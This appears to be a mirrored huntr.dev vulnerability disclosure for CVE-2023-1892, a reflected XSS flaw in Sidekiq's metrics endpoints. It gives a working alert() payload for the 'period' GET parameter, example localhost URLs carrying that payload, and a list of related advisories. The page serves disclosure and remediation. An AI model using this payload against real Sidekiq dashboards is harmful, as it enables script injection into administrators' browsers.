Lucene search
SpercexE35E5653-C429-4FB8-94A3-CBC123AE4777HistoryApr 02, 2023 - 9:39 p.m.
Reflected XSS on Sidekiq through multiples endpoints via GET parameter "period"
2023-04-0221:39:17
spercex
www.huntr.dev
9
reflected xss
sidekiq
get parameter
EPSS
0.027
Percentile
90.6%
Description
Reflected XSS attacks, also known as non-persistent attacks, occur when a malicious script is reflected off of a web application to the victim’s browser.
Proof of Concept
There must have been a metrics during the default value of the period parameter.
You simply have to set the payload in the period parameter.
Payload : "><img/src/onerror=alert(document.domain)>
Example of URL with payload :
https://localhost/sidekiq/metrics?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3Ehttps://localhost/sidekiq/metrics/SanityChecksJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3Ehttps://localhost/sidekiq/metrics/ActiveStorage::PurgeJob?period=%22%3E%3Cimg/src/onerror=alert(document.domain)%3E
Related
osv
osv
sidekiq vulnerable to cross-site scripting
2023-04-21 06:30:19
CVE-2023-1892
2023-04-21 05:15:07
XSS sidekiq-unique-jobs UI server vulnerability
2024-02-13 18:34:16
github
github
sidekiq vulnerable to cross-site scripting
2023-04-21 06:30:19
XSS sidekiq-unique-jobs UI server vulnerability
2024-02-13 18:34:16
debiancve
debiancve
CVE-2023-1892
2023-04-21 05:15:07
ubuntucve
ubuntucve
CVE-2023-1892
2023-04-21 00:00:00
redhatcve
redhatcve
CVE-2023-1892
2023-04-21 12:57:23
veracode
veracode
Cross-Site Scripting (XSS)
2023-04-24 09:21:11
rubygems
rubygems
sidekiq vulnerable to cross-site scripting
2023-04-20 21:00:00
cvelist
cvelist
CVE-2023-1892 Cross-site Scripting (XSS) - Reflected in sidekiq/sidekiq
2023-04-05 00:00:00
cve
cve
CVE-2023-1892
2023-04-21 05:15:07
prion
prion
Cross site scripting
2023-04-21 05:15:00
nuclei
nuclei
Sidekiq < 7.0.8 - Cross-Site Scripting
2024-04-25 10:42:58
nvd
nvd
CVE-2023-1892
2023-04-21 05:15:07